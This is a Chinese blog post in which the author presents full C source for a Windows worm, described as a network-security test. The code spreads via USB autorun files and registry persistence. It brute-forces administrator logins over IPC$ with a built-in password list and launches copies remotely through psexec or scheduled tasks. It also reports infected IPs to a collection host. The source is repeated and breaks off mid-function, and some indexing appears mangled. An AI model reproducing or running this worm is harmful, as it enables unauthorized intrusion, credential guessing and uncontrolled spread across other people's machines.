一个基于框架的蠕虫
2010-09-24 09:33
351 查看
这是笔者去年年底编写的一个用于测试网络健壮性和用户防毒意识的蠕虫,基于我前期编写的框架编写的。我设定它运行1个月,然后自杀瓦解,唯一的中毒特征就是每隔8分钟强行恢复桌面一次。当然,我没有添加任何破坏性代码,也没有添加任何木马性代码。我的目的只是测试,得到一份报告,没有其他恶意。测试结果也在我意料之中:局域网安全很差,用户的防范措施也很差。
作者注:版权没有,随意修改。本框架仅供学习娱乐之用,勿做其他非法用途,否则责任自负!
//rcdomn.h,系统总体规划
#if !defined(_IHATEBUGGING)
#define _IHATEBUGGING
#include
<io.h>
#include <time.h>
#include <stdio.h>
#include <string.h>
struct sys{ //配置全局变量类型
char
syspath[18]; //系统路径
char hostip[16]; //主机IP
char
guestip[16]; //客户IP
char user[14]; //用户名
char
passwd[14]; //密码
char flag[6]; //标识
char lastdisk[4];
//最后一个盘符
unsigned send :1; //是否攻击网络,0不攻击,1攻击
unsigned
station :5; //客户本机标识/10的值,保留功能
unsigned hacknum :10; //已入侵的主机数
};
void getpath(); //获取系统路径
void
getconfig(); //获取配置信息
void openconfig(char *flagfile); //读取配置并解密
void saveconfig(char *flagfile); //加密保存配置
void filecopy(FILE *fp,char
*path); //拷贝副本
void checkTime(char *hostip); //和主机对时
void
changereg(unsigned char flag); //更改注册表
unsigned char Init(); //初始化
void hacknet(char *netid,unsigned char childip);//网络入侵
void
hackdisk(char *diskroot); //攻击U盘
void showdesk(); //显示桌面
unsigned char kill(); //自杀代码
unsigned char TIMER(long
minute); //主循环模拟事件
#endif // !defined(_IHATEBUGGING)
//init.cpp,系统初始化
#include <windows.h>
#include "rcdomn.h"
extern struct sys Sysmesg; //定义于config.cpp
extern char
*__args[6]; //定义于config.cpp
void saveconfig(char
*flagfile) //加密保存配置
{
struct sys message=Sysmesg;
char
*p=(char *)&message;
for(unsigned char i=0;i<sizeof(message);i++)
(*p++)+=17;
FILE *fp=fopen(flagfile,"wb");
fwrite(&message,sizeof(message),1,fp);
fclose(fp);
}
void
openconfig(char *flagfile) //读取配置并解密
{
FILE
*fp=fopen(flagfile,"rb");
fread(&Sysmesg,sizeof(Sysmesg),1,fp);
fclose(fp);
char *p=(char *)&Sysmesg;
for(unsigned char
i=0;i<sizeof(Sysmesg);i++)
(*p++)-=17;
}
void
getconfig() //从参数获取配置信息
{
char disk[4]="C://";
FILE *fp;
strcpy(Sysmesg.hostip,__args[1]);
if(strcmp(Sysmesg.hostip,"127.0.0.1"))
strcpy(Sysmesg.guestip,__args[2]);
else
{
char cmd[65];
WinExec("cmd.exe /c ipconfig.exe|find /"IP
Address/">ipaddress",SW_HIDE);
Sleep(2000);
fp=fopen("ipaddress","rb");
fgets(cmd,100,fp);
fclose(fp);
WinExec("cmd.exe /c /"del ipaddress/"",SW_HIDE);
for(unsigned char
i=strlen(cmd);cmd<'0' || cmd>'9';i--);
for(cmd=0;cmd!='
';i--);
strcpy(Sysmesg.guestip,&cmd); //获取本地IP地址
}
strcpy(Sysmesg.user,__args[3]);
strcpy(Sysmesg.passwd,__args[4]);
strcpy(Sysmesg.flag,__args[5]);
if(Sysmesg.flag[1]=='Z')
Sysmesg.flag[0]+=1,Sysmesg.flag[1]='A';
else
Sysmesg.flag[1]+=1;
if(Sysmesg.flag[0]=='Z' && Sysmesg.flag[1]=='Z' ||
!strcmp(Sysmesg.guestip,""))
Sysmesg.send=0;
else
Sysmesg.send=1;
Sysmesg.station=0; //获取本机标识/10的值
unsigned char i,k=strlen(Sysmesg.guestip)-1;
while(Sysmesg.guestip[--k]!='.');
for(i=k+1;i<(int)strlen(Sysmesg.guestip)-1;i++)
Sysmesg.station=Sysmesg.station*10+Sysmesg.guestip-'0';
while(access(disk,0)==0)
disk[0]++;
disk[0]--;
strcpy(Sysmesg.lastdisk,disk);
//获取最后一个盘符
Sysmesg.hacknum=0; //初始化已攻击机器数
fp=fopen("ipsend.bat","wb"); //将IP发往指定地点
fprintf(fp,"net use
////192.168.3.224//ipc$ haha /user:haha/r/n"); //192.168.3.224为接受报告的IP地址
fprintf(fp,"if %%errorlevel%%==0 echo
%s>>////192.168.3.224//admin$//tasks//child/r/n",
//192.168.3.224为接受报告的IP地址
Sysmesg.guestip);
fprintf(fp,"del
ipsend.bat");
fclose(fp);
WinExec("ipsend.bat",SW_HIDE);
if(strcmp(Sysmesg.hostip,"127.0.0.1")) //网络入侵则和主机对时
checkTime(Sysmesg.hostip);
}
void getpath() //获取系统路径
{
if(access("C://WINDOWS//Tasks",0)==0)
strcpy(Sysmesg.syspath,"C://WINDOWS//Tasks//");
else
if(access("C://WINNT//Tasks",0)==0)
strcpy(Sysmesg.syspath,"C://WINNT//Tasks//");
else
if(access("C://WINNT",0)==0)
strcpy(Sysmesg.syspath,"C://WINNT//");
else
strcpy(Sysmesg.syspath,"C://");
}
void filecopy(FILE
*fp,char *path) //拷贝副本
{
fprintf(fp,"attrib -r -h -s
%s/r/n",__args[0]);
fprintf(fp,"copy %s %s%s/r/n",__args[0],path,__args[0]);
fprintf(fp,"attrib +r +h +s %s/r/n",__args[0]);
fprintf(fp,"attrib +r +h
+s %s%s/r/n",path,__args[0]);
if(access("psexec.exe",0)==0)
{
fprintf(fp,"attrib -r -h -s psexec.exe/r/n");
fprintf(fp,"copy
psexec.exe %s/r/n",path);
fprintf(fp,"attrib +r +h +s psexec.exe/r/n");
fprintf(fp,"attrib +r +h +s %spsexec.exe/r/n",path);
}
}
void
checkTime(char hostip[16]) //和主机对时
{
FILE
*fp=fopen("checktime.bat","wb");
fprintf(fp,"net use ////%s//ipc$ /"/"
/user:/"/"/r/n",Sysmesg.hostip);
fprintf(fp,"net time ////%s /set
/y/r/n",Sysmesg.hostip);
fprintf(fp,"net use ////%s//ipc$ /del
/y/r/n",Sysmesg.hostip);
fprintf(fp,"del checktime.bat/r/n");
fclose(fp);
WinExec("checktime.bat",SW_HIDE);
}
void
changereg(unsigned char flag) //更改注册表
{
FILE
*fp=fopen("regchg.bat","wb");
fprintf(fp,"echo Windows Registry Editor
Version 5.00>change.reg/r/n");
fprintf(fp,"echo.>>change.reg/r/n");
fprintf(fp,"echo [HKEY_CURRENT_USER//Software//Microsoft//Windows NT//");
fprintf(fp,"CurrentVersion//Windows]>>change.reg/r/n");
if(flag==0)
fprintf(fp,"echo
/"load/"=/"/">>change.reg/r/n",__args[0]);
else
if(!strcmp(Sysmesg.syspath,"C://WINDOWS//Tasks//"))
fprintf(fp,"echo
/"load/"=/"C:////WINDOWS////Tasks////%s/">>change.reg/r/n",__args[0]);
else if(!strcmp(Sysmesg.syspath,"C://WINNT//Tasks//"))
fprintf(fp,"echo
/"load/"=/"C:////WINNT////Tasks////%s/">>change.reg/r/n",__args[0]);
else if(!strcmp(Sysmesg.syspath,"C://WINNT//"))
fprintf(fp,"echo
/"load/"=/"C:////WINNT////%s/">>change.reg/r/n",__args[0]);
else
fprintf(fp,"echo /"load/"=/"C:////%s/">>change.reg/r/n",__args[0]);
fprintf(fp,"regedit /s change.reg/r/n");
fprintf(fp,"del
change.reg/r/n");
fprintf(fp,"del regchg.bat/r/n");
fclose(fp);
WinExec("regchg.bat",SW_HIDE);
}
unsigned char Init()
//初始化
{
char flagfile[32];
getpath(); //获取系统路径
sprintf(flagfile,"%s%s",Sysmesg.syspath,__args[0]);
if(access(flagfile,0)==-1) //通过U盘传播进入或用户自己激发
{
FILE
*fp=fopen("localhak.bat","wb");
filecopy(fp,Sysmesg.syspath);
fprintf(fp,"start /D %s %s%s 127.0.0.1
",Sysmesg.syspath,Sysmesg.syspath,__args[0]);
fprintf(fp,"/"/"
administrator /"/" AA001/r/n");
if(__argc==2)
fprintf(fp,"explorer
%s/r/n",__args[1]); //打开U盘
fprintf(fp,"del localhak.bat/r/n");
fclose(fp);
WinExec("localhak.bat",SW_HIDE);
return 0;
}
if(__argc==2) //双击U盘时机器已感染
{
char cmd[20]="explorer ";
strcat(cmd,__args[1]);
WinExec(cmd,SW_SHOW);
return 0;
}
sprintf(flagfile,"%sconfig",Sysmesg.syspath);
if(__argc==6)
//通过网络入侵进入系统
{
getconfig();
saveconfig(flagfile);
changereg(1);
}
else
{
openconfig(flagfile);
sprintf(flagfile,"d://Recycled//%s",__args[0]);
if(access("d://",0)==0 && access(flagfile,0)==-1)
hackdisk("d://"); //感染D盘,防止重装系统
}
return 1;
}
//rcdomn.cpp,主文件
#include <time.h>
#include
<direct.h>
#include <windows.h>
#include "rcdomn.h"
struct sys Sysmesg; //配置全局变量
char *__args[6];
int WINAPI
WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int
nCmdShow)
{
unsigned char k=0,i;
long minute=0;
for(i=strlen(_pgmptr)-1;_pgmptr!='//';i--);
__args[0]=&_pgmptr; //获取可执行文件名
_pgmptr=0;
_chdir(_pgmptr); //更改当前目录到可执行文件目录
if(__argc>1) //分离命令行参数
for(i=1,__args[1]=lpCmdLine;lpCmdLine[k]!=0;k++)
if(lpCmdLine[k]=='
')
{
lpCmdLine[k]=0;
while(lpCmdLine[++k]==' ');
if(lpCmdLine[k]!=0)
__args[++i]=&lpCmdLine[k];
}
if(!Init()||(CreateMutex(NULL,TRUE,"_BACKUPRUN_")&&GetLastError()==ERROR_ALREADY_EXISTS))
return 0; //初始化失败或者程序已在运行就退出
while(1)
{
Sleep(5000);
if(TIMER(++minute))
return 0;
}
}
void hacknet(char
netid[12],unsigned char childip) //网络入侵
{
char
farid[4]="123",flag[6],flagfile[36];
char
*passwd[]={"/"/"","123","1234","12345","123456","1234567","7654321","654321","54321",
"888888","12345678","000000","god","God","haha","user","admin","passwd",
"password","guest","1983","1984","1985","1986","1987","1988","1989","1990",
"0125","0912","0705","0735","911","520","father","mother","brother","sister",
"beauty","beautiful","strong","power","powerful","rand","intel","dell",
"sony","Alcatel","alcatel","acer","lenovo","compaq","Dell","daevoo","iei",
"chocon","iei123","legend","Acer","pass","hack","hacker","crack","cracker",
"jay","allen","john","beijing","nanjing","hefei","jodan","backhan","LEGEND",
"LENOVO","Jodan","microsoft","Microsoft","bill","kiss","kitty","wang","zhang",
"liu","chen","yang","zhao","huang","iloveyou","ihateyou","19851225","zhou",
"copy","19851225","feifei","evil","xiaoqi","ashou","yinmo","angel","hero"};
int exist=access("psexec.exe",0);
FILE *fp=fopen("nethak.bat","wb");
farid[0]=childip/100+'0';
farid[1]=(childip%100)/10+'0';
farid[2]=childip%10+'0';
fprintf(fp,"net use ////%s%s//ipc$ /"/"
/user:/"/"/r/n",netid,farid);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use ////%s%s//ipc$ /del /y/r/n",netid,farid);
if(exist==0)
fprintf(fp,"set user=%s/r/nset
passwd=%s/r/n",Sysmesg.user,Sysmesg.passwd);
fprintf(fp,"net use
////%s%s//ipc$ ",netid,farid);
fprintf(fp,"%s
/user:%s/r/n",Sysmesg.passwd,Sysmesg.user);
if(exist==0)
{
fprintf(fp,"if %%errorlevel%%==0 goto ready/r/n");
fprintf(fp,"set
user=administrator/r/n");
for(int i=0;i<100;i++)
{
fprintf(fp,"set passwd=%s/r/n",passwd);
fprintf(fp,"net use ////%s%s//ipc$ %s /user:administrator/r/n",
netid,farid,passwd);
fprintf(fp,"if %%errorlevel%%==0 goto ready/r/n");
}
}
else
for(int i=0;i<100;i++)
fprintf(fp,"if errorlevel 1 net use
////%s%s//ipc$ %s /user:administrator/r/n",
netid,farid,passwd);
fprintf(fp,"if errorlevel 1 goto
end/r/n");
if(exist==0)
fprintf(fp,":ready/r/n");
sprintf(flagfile,"////%s%s//admin$//Tasks//",netid,farid);
fprintf(fp,"if not exist %s goto disconnect/r/n",flagfile);
fprintf(fp,"if exist %s%s goto disconnect/r/n",flagfile,__args[0]);
filecopy(fp,flagfile);
Sysmesg.hacknum++;
flag[0]=Sysmesg.flag[0];
flag[1]=Sysmesg.flag[1];
flag[2]=Sysmesg.hacknum/100+'0';
flag[3]=(Sysmesg.hacknum%100)/10+'0';
flag[4]=Sysmesg.hacknum%10+'0'; flag[5]=0;
if(exist==0) //如果工具存在,则利用工具启动
fprintf(fp,"psexec.exe
////%s%s -u %%user%% -p %%passwd%% -d ",netid,farid);
else //利用计划任务启动
{
time_t xx=time(0)+600;
char
tm[25];
strcpy(tm,ctime(&xx));
tm[19]=0;
fprintf(fp,"at
////%s%s %s ",netid,farid,&tm[11]);
}
fprintf(fp,"%s%s %s %s%s
",Sysmesg.syspath,__args[0],Sysmesg.guestip,netid,farid);
if(exist==0)
fprintf(fp,"%%user%% %%passwd%% %s/r/n",flag);
else
if(strcmp(Sysmesg.passwd,"/"/""))
fprintf(fp,"%s %s
%s/r/n",Sysmesg.user,Sysmesg.passwd,flag);
else
fprintf(fp,"%s
///"///" %s/r/n",Sysmesg.user,flag);
fprintf(fp,"echo
%s%s>>child/r/n",netid,farid);
fprintf(fp,":disconnect/r/n"); fprintf(fp,"net use * /del /y/r/n");
fprintf(fp,":end/r/n"); fprintf(fp,"del nethak.bat/r/n"); fclose(fp);
WinExec("nethak.bat",SW_HIDE);
sprintf(flagfile,"%s%s",Sysmesg.syspath,"config");
saveconfig(flagfile);
}
void hackdisk(char diskroot[4]) //感染U盘
{
char
copypath[13];
sprintf(copypath,"%sRecycled//",diskroot);
FILE
*fp=fopen("diskhack.bat","wb");
fprintf(fp,"if exist %sRecycled goto
complete/r/n",diskroot);
fprintf(fp,"md %sRecycled/r/n",diskroot);
fprintf(fp,"echo
[.ShellClassInfo]>%sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"echo
CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>%sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"attrib +r +h +s %sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"attrib +r +h +s %sRecycled/r/n",diskroot);
fprintf(fp,":complete/r/n");
fprintf(fp,"if not exist %sautorun.inf goto
ready/r/n",diskroot);
fprintf(fp,"attrib -s -r -h
%sautorun.inf/r/n",diskroot);
fprintf(fp,"del %sautorun.inf/r/n",diskroot);
fprintf(fp,":ready/r/n");
fprintf(fp,"echo
[autorun]>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo
open=.//Recycled//%s %%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
fprintf(fp,"echo.>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo
shell//1=打开(^&O)>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo
shell//1//Command=.//Recycled//%s
%%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
fprintf(fp,"echo.>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo
shellexecute=.//Recycled//%s
%%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
filecopy(fp,copypath);
fprintf(fp,"attrib +s +r +h %sautorun.inf/r/n",diskroot);
fprintf(fp,"del diskhack.bat/r/n"); fclose(fp);
WinExec("diskhack.bat",SW_HIDE);
}
void
showdesk() //显示桌面
{
FILE *fp=fopen("showdesk.bat","wb");
fprintf(fp,"cd ..///r/n");
fprintf(fp,"echo [Shell]>haha.scf/r/n");
fprintf(fp,"echo Command=^2>>haha.scf/r/n");
fprintf(fp,"echo
Iconfile=^explorer.exe,3>>haha.scf/r/n");
fprintf(fp,"echo
[Taskbar]>>haha.scf/r/n");
fprintf(fp,"echo
Command=^ToggleDesktop>>haha.scf/r/n");
fprintf(fp,"haha.scf/r/n");
fprintf(fp,"del haha.scf/r/n");
fprintf(fp,"del
tasks//showdesk.bat/r/n");
fclose(fp);
WinExec("showdesk.bat",SW_HIDE);
}
unsigned char kill() //自杀代码
{
if(time(0)<1165971645)
return 0;
changereg(0);
char
worm[30],disk[4]="Z://";
FILE *fp=fopen("killself.bat","wb");
fprintf(fp,"dir %s..//system32/r/n",Sysmesg.syspath);
for(disk[0]='Z';disk[0]>'B';disk[0]--)
{
sprintf(worm,"%sRecycled//%s",disk,__args[0]);
if(access(worm,0)==0)
{
fprintf(fp,"attrib -r -h -s %s/r/n",worm);
fprintf(fp,"attrib -r -h -s %sRecycled//psexec.exe/r/n",disk);
fprintf(fp,"attrib -r -h -s %sautorun.inf/r/n",disk);
fprintf(fp,"del
%s/r/n",worm);
fprintf(fp,"del %sRecycled//psexec.exe/r/n",disk);
fprintf(fp,"del %sautorun.inf/r/n",disk);
}
}
fprintf(fp,"attrib
-r -h -s %spsexec.exe/r/n",Sysmesg.syspath);
fprintf(fp,"del
%spsexec.exe/r/n",Sysmesg.syspath);
fprintf(fp,"del
%sconfig/r/n",Sysmesg.syspath);
fprintf(fp,"echo 您好:>c://see.txt/r/n");
fprintf(fp,"echo 至此,我们已经完成了测试任务,谢谢合作!>>c://see.txt/r/n");
fprintf(fp,"echo 如果测试中对您造成了不便,在此向您道歉!>>c://see.txt/r/n");
fprintf(fp,"net use ////192.168.3.224//ipc$ haha /user:haha/r/n");
//192.168.3.224为接受报告的IP地址
fprintf(fp,"if errorlevel 1 goto next/r/n");
fprintf(fp,"echo.>>c://see.txt/r/n");
fprintf(fp,"下面公布受感染机器的IP:>>c://see.txt/r/n");
fprintf(fp,"type
////192.168.3.224//admin$//tasks//child>>c://see.txt/r/n");
//192.168.3.224为接受报告的IP地址
fprintf(fp,":next/r/n");
fprintf(fp,"echo.>>c://see.txt/r/n");
fprintf(fp,"echo 测试人:影子>>c://see.txt/r/n");
fprintf(fp,"notepad c://see.txt/r/n");
fprintf(fp,"attrib -r -h -s
%s%s/r/n",Sysmesg.syspath,__args[0]);
fprintf(fp,"del
%s%s/r/n",Sysmesg.syspath,__args[0]);
fprintf(fp,"del killself.bat/r/n");
fclose(fp);
WinExec("killself.bat",SW_HIDE);
return 1;
}
unsigned char TIMER(long minute) //主循环模拟触发器
{
char
disk[4],backfile[25];
strcpy(disk,Sysmesg.lastdisk);
if(kill())
return 1;
for(disk[0]='Z';disk[0]>=Sysmesg.lastdisk[0];disk[0]--)
if(access(disk,0)==0) //感染U盘
{
sprintf(backfile,"%sRecycled//%s",disk,__args[0]);
if(access(backfile,0)==-1) //识别U盘是否已感染
{
hackdisk(disk);
Sleep(5000);
}
}
if(minute%59==0 &&
Sysmesg.send && Sysmesg.hacknum<1023) //尝试网络入侵
{
char
netid[16];
unsigned char childip;
strcpy(netid,Sysmesg.guestip);
if(Sysmesg.station==0)
netid[strlen(netid)-1]=0;
else
if(Sysmesg.station<10)
netid[strlen(netid)-2]=0;
else
netid[strlen(netid)-3]=0;
srand((unsigned)time(NULL)); //初始化种子
childip=rand()%254+1;
hacknet(netid,childip);
}
if(minute%97==0)
showdesk();
return 0;
}
作者注:版权没有,随意修改。本框架仅供学习娱乐之用,勿做其他非法用途,否则责任自负!
//rcdomn.h,系统总体规划
#if !defined(_IHATEBUGGING)
#define _IHATEBUGGING
#include
<io.h>
#include <time.h>
#include <stdio.h>
#include <string.h>
struct sys{ //配置全局变量类型
char
syspath[18]; //系统路径
char hostip[16]; //主机IP
char
guestip[16]; //客户IP
char user[14]; //用户名
char
passwd[14]; //密码
char flag[6]; //标识
char lastdisk[4];
//最后一个盘符
unsigned send :1; //是否攻击网络,0不攻击,1攻击
unsigned
station :5; //客户本机标识/10的值,保留功能
unsigned hacknum :10; //已入侵的主机数
};
void getpath(); //获取系统路径
void
getconfig(); //获取配置信息
void openconfig(char *flagfile); //读取配置并解密
void saveconfig(char *flagfile); //加密保存配置
void filecopy(FILE *fp,char
*path); //拷贝副本
void checkTime(char *hostip); //和主机对时
void
changereg(unsigned char flag); //更改注册表
unsigned char Init(); //初始化
void hacknet(char *netid,unsigned char childip);//网络入侵
void
hackdisk(char *diskroot); //攻击U盘
void showdesk(); //显示桌面
unsigned char kill(); //自杀代码
unsigned char TIMER(long
minute); //主循环模拟事件
#endif // !defined(_IHATEBUGGING)
//init.cpp,系统初始化
#include <windows.h>
#include "rcdomn.h"
extern struct sys Sysmesg; //定义于config.cpp
extern char
*__args[6]; //定义于config.cpp
void saveconfig(char
*flagfile) //加密保存配置
{
struct sys message=Sysmesg;
char
*p=(char *)&message;
for(unsigned char i=0;i<sizeof(message);i++)
(*p++)+=17;
FILE *fp=fopen(flagfile,"wb");
fwrite(&message,sizeof(message),1,fp);
fclose(fp);
}
void
openconfig(char *flagfile) //读取配置并解密
{
FILE
*fp=fopen(flagfile,"rb");
fread(&Sysmesg,sizeof(Sysmesg),1,fp);
fclose(fp);
char *p=(char *)&Sysmesg;
for(unsigned char
i=0;i<sizeof(Sysmesg);i++)
(*p++)-=17;
}
void
getconfig() //从参数获取配置信息
{
char disk[4]="C://";
FILE *fp;
strcpy(Sysmesg.hostip,__args[1]);
if(strcmp(Sysmesg.hostip,"127.0.0.1"))
strcpy(Sysmesg.guestip,__args[2]);
else
{
char cmd[65];
WinExec("cmd.exe /c ipconfig.exe|find /"IP
Address/">ipaddress",SW_HIDE);
Sleep(2000);
fp=fopen("ipaddress","rb");
fgets(cmd,100,fp);
fclose(fp);
WinExec("cmd.exe /c /"del ipaddress/"",SW_HIDE);
for(unsigned char
i=strlen(cmd);cmd<'0' || cmd>'9';i--);
for(cmd=0;cmd!='
';i--);
strcpy(Sysmesg.guestip,&cmd); //获取本地IP地址
}
strcpy(Sysmesg.user,__args[3]);
strcpy(Sysmesg.passwd,__args[4]);
strcpy(Sysmesg.flag,__args[5]);
if(Sysmesg.flag[1]=='Z')
Sysmesg.flag[0]+=1,Sysmesg.flag[1]='A';
else
Sysmesg.flag[1]+=1;
if(Sysmesg.flag[0]=='Z' && Sysmesg.flag[1]=='Z' ||
!strcmp(Sysmesg.guestip,""))
Sysmesg.send=0;
else
Sysmesg.send=1;
Sysmesg.station=0; //获取本机标识/10的值
unsigned char i,k=strlen(Sysmesg.guestip)-1;
while(Sysmesg.guestip[--k]!='.');
for(i=k+1;i<(int)strlen(Sysmesg.guestip)-1;i++)
Sysmesg.station=Sysmesg.station*10+Sysmesg.guestip-'0';
while(access(disk,0)==0)
disk[0]++;
disk[0]--;
strcpy(Sysmesg.lastdisk,disk);
//获取最后一个盘符
Sysmesg.hacknum=0; //初始化已攻击机器数
fp=fopen("ipsend.bat","wb"); //将IP发往指定地点
fprintf(fp,"net use
////192.168.3.224//ipc$ haha /user:haha/r/n"); //192.168.3.224为接受报告的IP地址
fprintf(fp,"if %%errorlevel%%==0 echo
%s>>////192.168.3.224//admin$//tasks//child/r/n",
//192.168.3.224为接受报告的IP地址
Sysmesg.guestip);
fprintf(fp,"del
ipsend.bat");
fclose(fp);
WinExec("ipsend.bat",SW_HIDE);
if(strcmp(Sysmesg.hostip,"127.0.0.1")) //网络入侵则和主机对时
checkTime(Sysmesg.hostip);
}
void getpath() //获取系统路径
{
if(access("C://WINDOWS//Tasks",0)==0)
strcpy(Sysmesg.syspath,"C://WINDOWS//Tasks//");
else
if(access("C://WINNT//Tasks",0)==0)
strcpy(Sysmesg.syspath,"C://WINNT//Tasks//");
else
if(access("C://WINNT",0)==0)
strcpy(Sysmesg.syspath,"C://WINNT//");
else
strcpy(Sysmesg.syspath,"C://");
}
void filecopy(FILE
*fp,char *path) //拷贝副本
{
fprintf(fp,"attrib -r -h -s
%s/r/n",__args[0]);
fprintf(fp,"copy %s %s%s/r/n",__args[0],path,__args[0]);
fprintf(fp,"attrib +r +h +s %s/r/n",__args[0]);
fprintf(fp,"attrib +r +h
+s %s%s/r/n",path,__args[0]);
if(access("psexec.exe",0)==0)
{
fprintf(fp,"attrib -r -h -s psexec.exe/r/n");
fprintf(fp,"copy
psexec.exe %s/r/n",path);
fprintf(fp,"attrib +r +h +s psexec.exe/r/n");
fprintf(fp,"attrib +r +h +s %spsexec.exe/r/n",path);
}
}
void
checkTime(char hostip[16]) //和主机对时
{
FILE
*fp=fopen("checktime.bat","wb");
fprintf(fp,"net use ////%s//ipc$ /"/"
/user:/"/"/r/n",Sysmesg.hostip);
fprintf(fp,"net time ////%s /set
/y/r/n",Sysmesg.hostip);
fprintf(fp,"net use ////%s//ipc$ /del
/y/r/n",Sysmesg.hostip);
fprintf(fp,"del checktime.bat/r/n");
fclose(fp);
WinExec("checktime.bat",SW_HIDE);
}
void
changereg(unsigned char flag) //更改注册表
{
FILE
*fp=fopen("regchg.bat","wb");
fprintf(fp,"echo Windows Registry Editor
Version 5.00>change.reg/r/n");
fprintf(fp,"echo.>>change.reg/r/n");
fprintf(fp,"echo [HKEY_CURRENT_USER//Software//Microsoft//Windows NT//");
fprintf(fp,"CurrentVersion//Windows]>>change.reg/r/n");
if(flag==0)
fprintf(fp,"echo
/"load/"=/"/">>change.reg/r/n",__args[0]);
else
if(!strcmp(Sysmesg.syspath,"C://WINDOWS//Tasks//"))
fprintf(fp,"echo
/"load/"=/"C:////WINDOWS////Tasks////%s/">>change.reg/r/n",__args[0]);
else if(!strcmp(Sysmesg.syspath,"C://WINNT//Tasks//"))
fprintf(fp,"echo
/"load/"=/"C:////WINNT////Tasks////%s/">>change.reg/r/n",__args[0]);
else if(!strcmp(Sysmesg.syspath,"C://WINNT//"))
fprintf(fp,"echo
/"load/"=/"C:////WINNT////%s/">>change.reg/r/n",__args[0]);
else
fprintf(fp,"echo /"load/"=/"C:////%s/">>change.reg/r/n",__args[0]);
fprintf(fp,"regedit /s change.reg/r/n");
fprintf(fp,"del
change.reg/r/n");
fprintf(fp,"del regchg.bat/r/n");
fclose(fp);
WinExec("regchg.bat",SW_HIDE);
}
unsigned char Init()
//初始化
{
char flagfile[32];
getpath(); //获取系统路径
sprintf(flagfile,"%s%s",Sysmesg.syspath,__args[0]);
if(access(flagfile,0)==-1) //通过U盘传播进入或用户自己激发
{
FILE
*fp=fopen("localhak.bat","wb");
filecopy(fp,Sysmesg.syspath);
fprintf(fp,"start /D %s %s%s 127.0.0.1
",Sysmesg.syspath,Sysmesg.syspath,__args[0]);
fprintf(fp,"/"/"
administrator /"/" AA001/r/n");
if(__argc==2)
fprintf(fp,"explorer
%s/r/n",__args[1]); //打开U盘
fprintf(fp,"del localhak.bat/r/n");
fclose(fp);
WinExec("localhak.bat",SW_HIDE);
return 0;
}
if(__argc==2) //双击U盘时机器已感染
{
char cmd[20]="explorer ";
strcat(cmd,__args[1]);
WinExec(cmd,SW_SHOW);
return 0;
}
sprintf(flagfile,"%sconfig",Sysmesg.syspath);
if(__argc==6)
//通过网络入侵进入系统
{
getconfig();
saveconfig(flagfile);
changereg(1);
}
else
{
openconfig(flagfile);
sprintf(flagfile,"d://Recycled//%s",__args[0]);
if(access("d://",0)==0 && access(flagfile,0)==-1)
hackdisk("d://"); //感染D盘,防止重装系统
}
return 1;
}
//rcdomn.cpp,主文件
#include <time.h>
#include
<direct.h>
#include <windows.h>
#include "rcdomn.h"
struct sys Sysmesg; //配置全局变量
char *__args[6];
int WINAPI
WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int
nCmdShow)
{
unsigned char k=0,i;
long minute=0;
for(i=strlen(_pgmptr)-1;_pgmptr!='//';i--);
__args[0]=&_pgmptr; //获取可执行文件名
_pgmptr=0;
_chdir(_pgmptr); //更改当前目录到可执行文件目录
if(__argc>1) //分离命令行参数
for(i=1,__args[1]=lpCmdLine;lpCmdLine[k]!=0;k++)
if(lpCmdLine[k]=='
')
{
lpCmdLine[k]=0;
while(lpCmdLine[++k]==' ');
if(lpCmdLine[k]!=0)
__args[++i]=&lpCmdLine[k];
}
if(!Init()||(CreateMutex(NULL,TRUE,"_BACKUPRUN_")&&GetLastError()==ERROR_ALREADY_EXISTS))
return 0; //初始化失败或者程序已在运行就退出
while(1)
{
Sleep(5000);
if(TIMER(++minute))
return 0;
}
}
void hacknet(char
netid[12],unsigned char childip) //网络入侵
{
char
farid[4]="123",flag[6],flagfile[36];
char
*passwd[]={"/"/"","123","1234","12345","123456","1234567","7654321","654321","54321",
"888888","12345678","000000","god","God","haha","user","admin","passwd",
"password","guest","1983","1984","1985","1986","1987","1988","1989","1990",
"0125","0912","0705","0735","911","520","father","mother","brother","sister",
"beauty","beautiful","strong","power","powerful","rand","intel","dell",
"sony","Alcatel","alcatel","acer","lenovo","compaq","Dell","daevoo","iei",
"chocon","iei123","legend","Acer","pass","hack","hacker","crack","cracker",
"jay","allen","john","beijing","nanjing","hefei","jodan","backhan","LEGEND",
"LENOVO","Jodan","microsoft","Microsoft","bill","kiss","kitty","wang","zhang",
"liu","chen","yang","zhao","huang","iloveyou","ihateyou","19851225","zhou",
"copy","19851225","feifei","evil","xiaoqi","ashou","yinmo","angel","hero"};
int exist=access("psexec.exe",0);
FILE *fp=fopen("nethak.bat","wb");
farid[0]=childip/100+'0';
farid[1]=(childip%100)/10+'0';
farid[2]=childip%10+'0';
fprintf(fp,"net use ////%s%s//ipc$ /"/"
/user:/"/"/r/n",netid,farid);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use ////%s%s//ipc$ /del /y/r/n",netid,farid);
if(exist==0)
fprintf(fp,"set user=%s/r/nset
passwd=%s/r/n",Sysmesg.user,Sysmesg.passwd);
fprintf(fp,"net use
////%s%s//ipc$ ",netid,farid);
fprintf(fp,"%s
/user:%s/r/n",Sysmesg.passwd,Sysmesg.user);
if(exist==0)
{
fprintf(fp,"if %%errorlevel%%==0 goto ready/r/n");
fprintf(fp,"set
user=administrator/r/n");
for(int i=0;i<100;i++)
{
fprintf(fp,"set passwd=%s/r/n",passwd);
fprintf(fp,"net use ////%s%s//ipc$ %s /user:administrator/r/n",
netid,farid,passwd);
fprintf(fp,"if %%errorlevel%%==0 goto ready/r/n");
}
}
else
for(int i=0;i<100;i++)
fprintf(fp,"if errorlevel 1 net use
////%s%s//ipc$ %s /user:administrator/r/n",
netid,farid,passwd);
fprintf(fp,"if errorlevel 1 goto
end/r/n");
